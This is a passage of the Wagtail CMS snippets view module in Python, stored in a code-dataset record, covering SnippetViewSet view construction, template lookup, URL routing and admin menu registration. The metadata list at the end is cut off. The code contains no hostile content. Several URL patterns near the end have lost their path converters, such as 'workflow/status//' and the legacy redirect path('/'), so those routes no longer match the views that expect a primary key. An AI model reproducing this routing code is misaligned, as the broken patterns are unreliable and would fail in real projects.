edit_url_name=self.get_url_name(\"edit\"),\n revisions_view_url_name=self.get_url_name(\"revisions_view\"),\n revisions_revert_url_name=self.get_url_name(\"revisions_revert\"),\n revisions_compare_url_name=self.get_url_name(\"revisions_compare\"),\n revisions_unschedule_url_name=self.get_url_name(\"revisions_unschedule\"),\n )\n\n @property\n def inspect_view(self):\n return self.inspect_view_class.as_view(\n model=self.model,\n template_name=self.get_inspect_template(),\n permission_policy=self.permission_policy,\n edit_url_name=self.get_url_name(\"edit\"),\n delete_url_name=self.get_url_name(\"delete\"),\n fields=self.inspect_view_fields,\n fields_exclude=self.inspect_view_fields_exclude,\n )\n\n @property\n def revisions_view(self):\n return self.revisions_view_class.as_view(\n model=self.model,\n permission_policy=self.permission_policy,\n )\n\n @property\n def revisions_revert_view(self):\n return self.revisions_revert_view_class.as_view(\n model=self.model,\n template_name=self.get_edit_template(),\n header_icon=self.icon,\n permission_policy=self.permission_policy,\n panel=self._edit_handler,\n form_class=self.get_form_class(for_update=True),\n index_url_name=self.get_url_name(\"list\"),\n edit_url_name=self.get_url_name(\"edit\"),\n delete_url_name=self.get_url_name(\"delete\"),\n history_url_name=self.get_url_name(\"history\"),\n preview_url_name=self.get_url_name(\"preview_on_edit\"),\n lock_url_name=self.get_url_name(\"lock\"),\n unlock_url_name=self.get_url_name(\"unlock\"),\n usage_url_name=self.get_url_name(\"usage\"),\n revisions_compare_url_name=self.get_url_name(\"revisions_compare\"),\n 
revisions_unschedule_url_name=self.get_url_name(\"revisions_unschedule\"),\n revisions_revert_url_name=self.get_url_name(\"revisions_revert\"),\n workflow_history_url_name=self.get_url_name(\"workflow_history\"),\n confirm_workflow_cancellation_url_name=self.get_url_name(\n \"confirm_workflow_cancellation\"\n ),\n )\n\n @property\n def revisions_compare_view(self):\n return self.revisions_compare_view_class.as_view(\n model=self.model,\n edit_handler=self._edit_handler,\n template_name=self.get_templates(\n \"revisions_compare\",\n fallback=self.revisions_compare_view_class.template_name,\n ),\n header_icon=self.icon,\n permission_policy=self.permission_policy,\n edit_url_name=self.get_url_name(\"edit\"),\n history_url_name=self.get_url_name(\"history\"),\n )\n\n @property\n def revisions_unschedule_view(self):\n return self.revisions_unschedule_view_class.as_view(\n model=self.model,\n template_name=self.get_templates(\n \"revisions_unschedule\",\n fallback=self.revisions_unschedule_view_class.template_name,\n ),\n header_icon=self.icon,\n permission_policy=self.permission_policy,\n edit_url_name=self.get_url_name(\"edit\"),\n history_url_name=self.get_url_name(\"history\"),\n revisions_unschedule_url_name=self.get_url_name(\"revisions_unschedule\"),\n )\n\n @property\n def unpublish_view(self):\n return self.unpublish_view_class.as_view(\n model=self.model,\n template_name=self.get_templates(\n \"unpublish\", fallback=self.unpublish_view_class.template_name\n ),\n header_icon=self.icon,\n permission_policy=self.permission_policy,\n index_url_name=self.get_url_name(\"list\"),\n edit_url_name=self.get_url_name(\"edit\"),\n unpublish_url_name=self.get_url_name(\"unpublish\"),\n usage_url_name=self.get_url_name(\"usage\"),\n )\n\n @property\n def preview_on_add_view(self):\n return self.preview_on_add_view_class.as_view(\n model=self.model,\n form_class=self.get_form_class(),\n )\n\n @property\n def preview_on_edit_view(self):\n return self.preview_on_edit_view_class.as_view(\n model=self.model,\n form_class=self.get_form_class(for_update=True),\n )\n\n @property\n def lock_view(self):\n return self.lock_view_class.as_view(\n model=self.model,\n permission_policy=self.permission_policy,\n success_url_name=self.get_url_name(\"edit\"),\n )\n\n @property\n def unlock_view(self):\n return self.unlock_view_class.as_view(\n model=self.model,\n permission_policy=self.permission_policy,\n success_url_name=self.get_url_name(\"edit\"),\n )\n\n @property\n def workflow_action_view(self):\n return self.workflow_action_view_class.as_view(\n model=self.model,\n redirect_url_name=self.get_url_name(\"edit\"),\n submit_url_name=self.get_url_name(\"workflow_action\"),\n )\n\n @property\n def collect_workflow_action_data_view(self):\n return self.collect_workflow_action_data_view_class.as_view(\n model=self.model,\n redirect_url_name=self.get_url_name(\"edit\"),\n submit_url_name=self.get_url_name(\"collect_workflow_action_data\"),\n )\n\n @property\n def confirm_workflow_cancellation_view(self):\n return self.confirm_workflow_cancellation_view_class.as_view(model=self.model)\n\n @property\n def workflow_status_view(self):\n return self.workflow_status_view_class.as_view(\n model=self.model,\n permission_policy=self.permission_policy,\n workflow_history_url_name=self.get_url_name(\"workflow_history\"),\n revisions_compare_url_name=self.get_url_name(\"revisions_compare\"),\n )\n\n @property\n def workflow_preview_view(self):\n return self.workflow_preview_view_class.as_view(model=self.model)\n\n @property\n def 
workflow_history_view(self):\n return self.workflow_history_view_class.as_view(\n model=self.model,\n template_name=self.get_templates(\n \"workflow_history/index\",\n fallback=self.workflow_history_view_class.template_name,\n ),\n header_icon=self.icon,\n permission_policy=self.permission_policy,\n workflow_history_url_name=self.get_url_name(\"workflow_history\"),\n workflow_history_detail_url_name=self.get_url_name(\n \"workflow_history_detail\"\n ),\n )\n\n @property\n def workflow_history_detail_view(self):\n return self.workflow_history_detail_view_class.as_view(\n model=self.model,\n template_name=self.get_templates(\n \"workflow_history/detail\",\n fallback=self.workflow_history_detail_view_class.template_name,\n ),\n object_icon=self.icon,\n permission_policy=self.permission_policy,\n workflow_history_url_name=self.get_url_name(\"workflow_history\"),\n )\n\n @property\n def redirect_to_edit_view(self):\n def redirect_to_edit(request, pk):\n return redirect(self.get_url_name(\"edit\"), pk, permanent=True)\n\n return redirect_to_edit\n\n @property\n def redirect_to_delete_view(self):\n def redirect_to_delete(request, pk):\n return redirect(self.get_url_name(\"delete\"), pk, permanent=True)\n\n return redirect_to_delete\n\n @property\n def redirect_to_usage_view(self):\n def redirect_to_usage(request, pk):\n return redirect(self.get_url_name(\"usage\"), pk, permanent=True)\n\n return redirect_to_usage\n\n @property\n def chooser_viewset(self):\n return self.chooser_viewset_class(\n self.get_chooser_admin_url_namespace(),\n model=self.model,\n url_prefix=self.get_chooser_admin_base_path(),\n icon=self.icon,\n per_page=self.chooser_per_page,\n )\n\n def get_icon(self):\n \"\"\"Returns the icon to be used for the admin views.\"\"\"\n return self.icon\n\n def get_menu_label(self):\n \"\"\"Returns the label text to be used for the menu item.\"\"\"\n return self.menu_label or self.model_opts.verbose_name_plural.title()\n\n def get_menu_name(self):\n \"\"\"Returns the name to be used for the menu item.\"\"\"\n return self.menu_name\n\n def get_menu_icon(self):\n \"\"\"Returns the icon to be used for the menu item.\"\"\"\n return self.get_icon()\n\n def get_menu_order(self):\n \"\"\"Returns the ordering number to be applied to the menu item.\"\"\"\n # By default, put it at the last item before Reports, whose order is 9000.\n return self.menu_order or 8999\n\n @property\n def menu_item_class(self):\n def is_shown(_self, request):\n return self.permission_policy.user_has_any_permission(\n request.user, (\"add\", \"change\", \"delete\")\n )\n\n return type(\n f\"{self.model.__name__}MenuItem\",\n (MenuItem,),\n {\"is_shown\": is_shown},\n )\n\n def get_menu_item(self, order=None):\n \"\"\"\n Returns a ``MenuItem`` instance to be registered with the Wagtail admin.\n\n The ``order`` parameter allows the method to be called from the outside (e.g.\n :class:`SnippetViewSetGroup`) to create a sub menu item with the correct order.\n \"\"\"\n return self.menu_item_class(\n label=self.get_menu_label(),\n url=reverse(self.get_url_name(\"index\")),\n name=self.get_menu_name(),\n icon_name=self.get_menu_icon(),\n order=order or self.get_menu_order(),\n )\n\n def get_menu_item_is_registered(self):\n return self.menu_item_is_registered\n\n def get_queryset(self, request):\n \"\"\"\n Returns a QuerySet of all model instances to be shown on the index view.\n If ``None`` is returned (the default), the logic in\n ``index_view.get_base_queryset()`` will be used instead.\n \"\"\"\n return None\n\n def 
get_export_filename(self):\n        return self.export_filename or self.model_opts.db_table\n\n    def get_templates(self, action=\"index\", fallback=\"\"):\n        \"\"\"\n        Utility function that provides a list of templates to try for a given\n        view, when the template isn't overridden by one of the template\n        attributes on the class.\n        \"\"\"\n        templates = [\n            f\"{self.template_prefix}{self.app_label}/{self.model_name}/{action}.html\",\n            f\"{self.template_prefix}{self.app_label}/{action}.html\",\n            f\"{self.template_prefix}{action}.html\",\n        ]\n        if fallback:\n            templates.append(fallback)\n        return templates\n\n    def get_index_template(self):\n        \"\"\"\n        Returns a template to be used when rendering ``index_view``. If a\n        template is specified by the ``index_template_name`` attribute, that will\n        be used. Otherwise, a list of preferred template names is returned.\n        \"\"\"\n        return self.index_template_name or self.get_templates(\"index\")\n\n    def get_index_results_template(self):\n        \"\"\"\n        Returns a template to be used when rendering ``index_results_view``. If a\n        template is specified by the ``index_results_template_name`` attribute, that will\n        be used. Otherwise, a list of preferred template names is returned.\n        \"\"\"\n        return self.index_results_template_name or self.get_templates(\"index_results\")\n\n    def get_create_template(self):\n        \"\"\"\n        Returns a template to be used when rendering ``create_view``. If a\n        template is specified by the ``create_template_name`` attribute, that will\n        be used. Otherwise, a list of preferred template names is returned.\n        \"\"\"\n        return self.create_template_name or self.get_templates(\"create\")\n\n    def get_edit_template(self):\n        \"\"\"\n        Returns a template to be used when rendering ``edit_view``. If a\n        template is specified by the ``edit_template_name`` attribute, that will\n        be used. Otherwise, a list of preferred template names is returned.\n        \"\"\"\n        return self.edit_template_name or self.get_templates(\"edit\")\n\n    def get_delete_template(self):\n        \"\"\"\n        Returns a template to be used when rendering ``delete_view``. If a\n        template is specified by the ``delete_template_name`` attribute, that will\n        be used. Otherwise, a list of preferred template names is returned.\n        \"\"\"\n        return self.delete_template_name or self.get_templates(\"delete\")\n\n    def get_history_template(self):\n        \"\"\"\n        Returns a template to be used when rendering ``history_view``. If a\n        template is specified by the ``history_template_name`` attribute, that will\n        be used. Otherwise, a list of preferred template names is returned.\n        \"\"\"\n        return self.history_template_name or self.get_templates(\"history\")\n\n    def get_inspect_template(self):\n        \"\"\"\n        Returns a template to be used when rendering ``inspect_view``. If a\n        template is specified by the ``inspect_template_name`` attribute, that will\n        be used. 
Otherwise, a list of preferred template names is returned.\n        \"\"\"\n        return self.inspect_template_name or self.get_templates(\n            \"inspect\", fallback=self.inspect_view_class.template_name\n        )\n\n    def get_admin_url_namespace(self):\n        \"\"\"Returns the URL namespace for the admin URLs for this model.\"\"\"\n        if self.admin_url_namespace:\n            return self.admin_url_namespace\n        return f\"wagtailsnippets_{self.app_label}_{self.model_name}\"\n\n    def get_admin_base_path(self):\n        \"\"\"\n        Returns the base path for the admin URLs for this model.\n        The returned string must not begin or end with a slash.\n        \"\"\"\n        if self.base_url_path:\n            return self.base_url_path.strip().strip(\"/\")\n        return f\"snippets/{self.app_label}/{self.model_name}\"\n\n    def get_chooser_admin_url_namespace(self):\n        \"\"\"Returns the URL namespace for the chooser admin URLs for this model.\"\"\"\n        if self.chooser_admin_url_namespace:\n            return self.chooser_admin_url_namespace\n        return f\"wagtailsnippetchoosers_{self.app_label}_{self.model_name}\"\n\n    def get_chooser_admin_base_path(self):\n        \"\"\"\n        Returns the base path for the chooser admin URLs for this model.\n        The returned string must not begin or end with a slash.\n        \"\"\"\n        if self.chooser_base_url_path:\n            return self.chooser_base_url_path.strip().strip(\"/\")\n        return f\"snippets/choose/{self.app_label}/{self.model_name}\"\n\n    @property\n    def url_finder_class(self):\n        return type(\n            \"_SnippetAdminURLFinder\", (SnippetAdminURLFinder,), {\"model\": self.model}\n        )\n\n    def get_urlpatterns(self):\n        urlpatterns = super().get_urlpatterns() + [\n            path(\"\", self.index_view, name=\"list\"),\n            path(\"results/\", self.index_results_view, name=\"list_results\"),\n            path(\"add/\", self.add_view, name=\"add\"),\n            path(\"edit/<str:pk>/\", self.edit_view, name=\"edit\"),\n            path(\"delete/<str:pk>/\", self.delete_view, name=\"delete\"),\n            path(\"usage/<str:pk>/\", self.usage_view, name=\"usage\"),\n            path(\"history/<str:pk>/\", self.history_view, name=\"history\"),\n        ]\n\n        if self.inspect_view_enabled:\n            urlpatterns += [\n                path(\"inspect/<str:pk>/\", self.inspect_view, name=\"inspect\")\n            ]\n\n        if self.preview_enabled:\n            urlpatterns += [\n                path(\"preview/\", self.preview_on_add_view, name=\"preview_on_add\"),\n                path(\n                    \"preview/<str:pk>/\",\n                    self.preview_on_edit_view,\n                    name=\"preview_on_edit\",\n                ),\n            ]\n\n        if self.revision_enabled:\n            if self.preview_enabled:\n                urlpatterns += [\n                    path(\n                        \"history/<str:pk>/revisions/<int:revision_id>/view/\",\n                        self.revisions_view,\n                        name=\"revisions_view\",\n                    )\n                ]\n\n            urlpatterns += [\n                path(\n                    \"history/<str:pk>/revisions/<int:revision_id>/revert/\",\n                    self.revisions_revert_view,\n                    name=\"revisions_revert\",\n                ),\n                re_path(\n                    r\"history/(?P<pk>.+)/revisions/compare/(?P<revision_id_a>live|earliest|\\d+)\\.\\.\\.(?P<revision_id_b>live|latest|\\d+)/$\",\n                    self.revisions_compare_view,\n                    name=\"revisions_compare\",\n                ),\n            ]\n\n        if self.draftstate_enabled:\n            urlpatterns += [\n                path(\n                    \"history/<str:pk>/revisions/<int:revision_id>/unschedule/\",\n                    self.revisions_unschedule_view,\n                    name=\"revisions_unschedule\",\n                ),\n                path(\"unpublish/<str:pk>/\", self.unpublish_view, name=\"unpublish\"),\n            ]\n\n        if self.locking_enabled:\n            urlpatterns += [\n                path(\"lock/<str:pk>/\", self.lock_view, name=\"lock\"),\n                path(\"unlock/<str:pk>/\", self.unlock_view, name=\"unlock\"),\n            ]\n\n        if self.workflow_enabled:\n            urlpatterns += [\n                path(\n                    \"workflow/action/<str:pk>/<slug:action_name>/<int:task_state_id>/\",\n                    self.workflow_action_view,\n                    name=\"workflow_action\",\n                ),\n                path(\n                    \"workflow/collect_action_data/<str:pk>/<slug:action_name>/<int:task_state_id>/\",\n                    self.collect_workflow_action_data_view,\n                    name=\"collect_workflow_action_data\",\n                ),\n                path(\n                    \"workflow/confirm_cancellation/<str:pk>/\",\n                    self.confirm_workflow_cancellation_view,\n                    
name=\"confirm_workflow_cancellation\",\n ),\n path(\n \"workflow/status//\",\n self.workflow_status_view,\n name=\"workflow_status\",\n ),\n path(\n \"workflow_history//\",\n self.workflow_history_view,\n name=\"workflow_history\",\n ),\n path(\n \"workflow_history//detail//\",\n self.workflow_history_detail_view,\n name=\"workflow_history_detail\",\n ),\n ]\n\n if self.preview_enabled:\n urlpatterns += [\n path(\n \"workflow/preview///\",\n self.workflow_preview_view,\n name=\"workflow_preview\",\n ),\n ]\n\n legacy_redirects = [\n # legacy URLs that could potentially collide if the pk matches one of the reserved names above\n # ('add', 'edit' etc) - redirect to the unambiguous version\n path(\"/\", self.redirect_to_edit_view),\n path(\"/delete/\", self.redirect_to_delete_view),\n path(\"/usage/\", self.redirect_to_usage_view),\n ]\n\n return urlpatterns + legacy_redirects\n\n def get_edit_handler(self):\n \"\"\"\n Returns the appropriate edit handler for this ``SnippetViewSet`` class.\n It can be defined either on the model itself or on the ``SnippetViewSet``,\n as the ``edit_handler`` or ``panels`` properties. Falls back to\n extracting panel / edit handler definitions from the model class.\n \"\"\"\n if hasattr(self, \"edit_handler\"):\n edit_handler = self.edit_handler\n elif hasattr(self, \"panels\"):\n panels = self.panels\n edit_handler = ObjectList(panels)\n elif hasattr(self.model, \"edit_handler\"):\n edit_handler = self.model.edit_handler\n elif hasattr(self.model, \"panels\"):\n panels = self.model.panels\n edit_handler = ObjectList(panels)\n else:\n exclude = self.get_exclude_form_fields()\n panels = extract_panel_definitions_from_model_class(\n self.model, exclude=exclude\n )\n edit_handler = ObjectList(panels)\n return edit_handler.bind_to_model(self.model)\n\n def get_form_class(self, for_update=False):\n return self._edit_handler.get_form_class()\n\n def register_model_check(self):\n def snippets_model_check(app_configs, **kwargs):\n return check_panels_in_model(self.model, \"snippets\")\n\n checks.register(snippets_model_check, \"panels\")\n\n def register_menu_item(self):\n if self.add_to_settings_menu:\n hooks.register(\"register_settings_menu_item\", self.get_menu_item)\n elif self.add_to_admin_menu:\n hooks.register(\"register_admin_menu_item\", self.get_menu_item)\n\n def on_register(self):\n super().on_register()\n # For convenience, attach viewset to the model class to allow accessing\n # the configuration of a given model.\n self.model.snippet_viewset = self\n viewsets.register(self.chooser_viewset)\n self.register_model_check()\n self.register_menu_item()\n\n\nclass SnippetViewSetGroup:\n \"\"\"\n A container for grouping together multiple SnippetViewSet instances. 
Creates\n a menu item with a submenu for accessing the listing pages of those instances.\n \"\"\"\n\n #: A list or tuple of :class:`SnippetViewSet` classes to be grouped together\n items = ()\n\n #: Register a custom menu item for the group in the admin's main menu.\n add_to_admin_menu = True\n\n # Undocumented for now, but it is technically possible to register the group's\n # menu item in the Settings menu instead of the main menu.\n add_to_settings_menu = False\n\n #: The icon used for the menu item that appears in Wagtail's sidebar.\n menu_icon = None\n\n #: The displayed label used for the menu item.\n #: If unset, the title-cased version of the first model's :attr:`~django.db.models.Options.app_label` will be used.\n menu_label = None\n\n #: The ``name`` argument passed to the ``MenuItem`` constructor, becoming the ``name`` attribute value for that instance.\n #: This can be useful when manipulating the menu items in a custom menu hook, e.g. :ref:`construct_main_menu`.\n #: If unset, a slugified version of the label is used.\n menu_name = None\n\n #: An integer determining the order of the menu item, 0 being the first place.\n menu_order = None\n\n def __init__(self):\n \"\"\"\n When initialising, instantiate the classes within 'items', and assign\n the instances to a ``viewsets`` attribute.\n \"\"\"\n self.viewsets = [\n viewset_class(menu_item_is_registered=True) for viewset_class in self.items\n ]\n\n def get_app_label_from_subitems(self):\n for instance in self.viewsets:\n return instance.app_label.title()\n return \"\"\n\n def get_menu_label(self):\n \"\"\"Returns the label text to be used for the menu item.\"\"\"\n return self.menu_label or self.get_app_label_from_subitems()\n\n def get_menu_name(self):\n \"\"\"Returns the name to be used for the menu item.\"\"\"\n return self.menu_name\n\n def get_menu_icon(self):\n \"\"\"Returns the icon to be used for the menu item.\"\"\"\n return self.menu_icon or \"folder-open-inverse\"\n\n def get_menu_order(self):\n \"\"\"Returns the ordering number to be applied to the menu item.\"\"\"\n return self.menu_order or 8999\n\n def get_submenu_items(self):\n menu_items = []\n item_order = 1\n for viewset in self.viewsets:\n menu_items.append(viewset.get_menu_item(order=item_order))\n item_order += 1\n return menu_items\n\n def get_menu_item(self):\n \"\"\"Returns a ``MenuItem`` instance to be registered with the Wagtail admin.\"\"\"\n if not self.viewsets:\n return None\n submenu = Menu(items=self.get_submenu_items())\n return SubmenuMenuItem(\n label=self.get_menu_label(),\n menu=submenu,\n name=self.get_menu_name(),\n icon_name=self.get_menu_icon(),\n order=self.get_menu_order(),\n )\n\n def register_menu_item(self):\n if self.add_to_settings_menu:\n hooks.register(\"register_settings_menu_item\", self.get_menu_item)\n elif self.add_to_admin_menu:\n hooks.register(\"register_admin_menu_item\", self.get_menu_item)\n\n def on_register(self):\n self.register_menu_item()\n", "sub_path": "wagtail/snippets/views/snippets.py", "file_name": "snippets.py", "file_ext": "py", "file_size_in_byte": 63703, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.apps.apps.get_model", "line_number": 65, "usage_type": "call"}, {"api_name": "django.apps.apps", "line_number": 65, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 67, "usage_type": "name"}, {"api_name": "wagtail.snippets.models.get_snippet_models", "line_number": 68, "usage_type": "call"}, 
{"api_name": "django.http.Http404", "line_number": 70, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.IndexView", "line_number": 78, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 78, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 79, "usage_type": "call"}, {"api_name": "django.utils.text.capfirst", "line_number": 91, "usage_type": "call"}, {"api_name": "wagtail.snippets.models.get_snippet_models", "line_number": 95, "usage_type": "call"}, {"api_name": "wagtail.snippets.permissions.user_can_edit_snippet_type", "line_number": 96, "usage_type": "call"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 101, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 105, "usage_type": "call"}, {"api_name": "wagtail.admin.ui.tables.TitleColumn", "line_number": 112, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 114, "usage_type": "call"}, {"api_name": "wagtail.admin.ui.tables.Column", "line_number": 118, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 120, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 127, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 133, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 139, "usage_type": "name"}, {"api_name": "wagtail.admin.ui.tables.TitleColumn", "line_number": 154, "usage_type": "name"}, {"api_name": "wagtail.admin.views.mixins.SpreadsheetExportMixin", "line_number": 159, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.IndexViewOptionalFeaturesMixin", "line_number": 160, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 160, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.IndexView", "line_number": 161, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 161, "usage_type": "name"}, {"api_name": "wagtail.admin.ui.tables.InlineActionsTable", "line_number": 168, "usage_type": "name"}, {"api_name": "wagtail.admin.ui.tables.BulkActionsCheckboxColumn", "line_number": 184, "usage_type": "call"}, {"api_name": "wagtail.models.Locale.objects.all", "line_number": 206, "usage_type": "call"}, {"api_name": "wagtail.models.Locale.objects", "line_number": 206, "usage_type": "attribute"}, {"api_name": "wagtail.models.Locale", "line_number": 206, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.CreateEditViewOptionalFeaturesMixin", "line_number": 219, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 219, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.CreateView", "line_number": 219, "usage_type": "attribute"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 224, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 233, "usage_type": "call"}, {"api_name": "wagtail.models.Locale.get_default", "line_number": 244, "usage_type": "call"}, {"api_name": "wagtail.models.Locale", "line_number": 244, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 247, "usage_type": "call"}, {"api_name": "wagtail.snippets.action_menu.SnippetActionMenu", "line_number": 250, "usage_type": "call"}, {"api_name": "wagtail.snippets.side_panels.SnippetSidePanels", "line_number": 273, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 296, 
"usage_type": "call"}, {"api_name": "wagtail.models.Locale.objects.all", "line_number": 300, "usage_type": "call"}, {"api_name": "wagtail.models.Locale.objects", "line_number": 300, "usage_type": "attribute"}, {"api_name": "wagtail.models.Locale", "line_number": 300, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.CreateEditViewOptionalFeaturesMixin", "line_number": 306, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 306, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.EditView", "line_number": 306, "usage_type": "attribute"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 314, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 323, "usage_type": "call"}, {"api_name": "django.contrib.admin.utils.quote", "line_number": 323, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 326, "usage_type": "call"}, {"api_name": "django.contrib.admin.utils.quote", "line_number": 326, "usage_type": "call"}, {"api_name": "wagtail.snippets.action_menu.SnippetActionMenu", "line_number": 329, "usage_type": "call"}, {"api_name": "wagtail.snippets.side_panels.SnippetSidePanels", "line_number": 344, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 374, "usage_type": "call"}, {"api_name": "django.contrib.admin.utils.quote", "line_number": 376, "usage_type": "call"}, {"api_name": "wagtail.admin.views.generic.DeleteView", "line_number": 387, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 387, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 389, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 400, "usage_type": "call"}, {"api_name": "django.utils.text.capfirst", "line_number": 401, "usage_type": "call"}, {"api_name": "wagtail.admin.views.generic.UsageView", "line_number": 406, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 406, "usage_type": "name"}, {"api_name": "wagtail.admin.filters.WagtailFilterSet", "line_number": 413, "usage_type": "name"}, {"api_name": "django_filters.ChoiceFilter", "line_number": 414, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 415, "usage_type": "call"}, {"api_name": "wagtail.log_actions.registry.get_choices", "line_number": 416, "usage_type": "attribute"}, {"api_name": "wagtail.log_actions.registry", "line_number": 416, "usage_type": "name"}, {"api_name": "django_filters.ModelChoiceFilter", "line_number": 418, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 419, "usage_type": "call"}, {"api_name": "wagtail.models.audit_log.ModelLogEntry.objects.all", "line_number": 421, "usage_type": "call"}, {"api_name": "wagtail.models.audit_log.ModelLogEntry.objects", "line_number": 421, "usage_type": "attribute"}, {"api_name": "wagtail.models.audit_log.ModelLogEntry", "line_number": 421, "usage_type": "name"}, {"api_name": "django_filters.DateFromToRangeFilter", "line_number": 423, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 424, "usage_type": "call"}, {"api_name": "wagtail.admin.filters.DateRangePickerWidget", "line_number": 424, "usage_type": "name"}, {"api_name": "wagtail.models.audit_log.ModelLogEntry", "line_number": 428, "usage_type": "name"}, {"api_name": "wagtail.admin.ui.tables.Column", "line_number": 432, "usage_type": "name"}, {"api_name": 
"wagtail.models.RevisionMixin", "line_number": 442, "usage_type": "argument"}, {"api_name": "wagtail.models.DraftStateMixin", "line_number": 443, "usage_type": "argument"}, {"api_name": "wagtail.models.PreviewableMixin", "line_number": 444, "usage_type": "argument"}, {"api_name": "wagtail.admin.views.reports.base.ReportView", "line_number": 451, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 461, "usage_type": "call"}, {"api_name": "wagtail.admin.ui.tables.InlineActionsTable", "line_number": 466, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 474, "usage_type": "call"}, {"api_name": "django.contrib.admin.utils.unquote", "line_number": 474, "usage_type": "call"}, {"api_name": "wagtail.models.DraftStateMixin", "line_number": 475, "usage_type": "argument"}, {"api_name": "django.utils.translation.gettext", "line_number": 489, "usage_type": "call"}, {"api_name": "wagtail.admin.ui.tables.UserColumn", "line_number": 491, "usage_type": "call"}, {"api_name": "wagtail.admin.ui.tables.DateColumn", "line_number": 492, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 492, "usage_type": "call"}, {"api_name": "wagtail.log_actions.registry.get_logs_for_instance", "line_number": 503, "usage_type": "call"}, {"api_name": "wagtail.log_actions.registry", "line_number": 503, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.InspectView", "line_number": 508, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 508, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.preview.PreviewOnCreate", "line_number": 513, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.preview.PreviewOnEdit", "line_number": 517, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.permissions.PermissionCheckedMixin", "line_number": 521, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.preview.PreviewRevision", "line_number": 521, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.permissions.PermissionCheckedMixin", "line_number": 525, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.RevisionsCompareView", "line_number": 525, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 525, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 530, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 536, "usage_type": "call"}, {"api_name": "wagtail.admin.views.generic.permissions.PermissionCheckedMixin", "line_number": 541, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.UnpublishView", "line_number": 541, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 541, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.permissions.PermissionCheckedMixin", "line_number": 545, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.RevisionsUnscheduleView", "line_number": 545, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic", "line_number": 545, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.permissions.PermissionCheckedMixin", "line_number": 549, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.lock.LockView", "line_number": 549, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic.lock", "line_number": 549, "usage_type": "name"}, {"api_name": 
"wagtail.models.WorkflowMixin", "line_number": 557, "usage_type": "argument"}, {"api_name": "wagtail.admin.views.generic.permissions.PermissionCheckedMixin", "line_number": 568, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.lock.UnlockView", "line_number": 568, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic.lock", "line_number": 568, "usage_type": "name"}, {"api_name": "wagtail.models.WorkflowMixin", "line_number": 581, "usage_type": "argument"}, {"api_name": "wagtail.admin.views.generic.workflow.WorkflowAction", "line_number": 591, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic.workflow", "line_number": 591, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.workflow.CollectWorkflowActionData", "line_number": 595, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic.workflow", "line_number": 595, "usage_type": "name"}, {"api_name": "wagtail.admin.views.generic.workflow.ConfirmWorkflowCancellation", "line_number": 599, "usage_type": "attribute"}, {"api_name": "wagtail.admin.views.generic.workflow", "line_number": 599, "usage_type": "name"}, {"api_name": 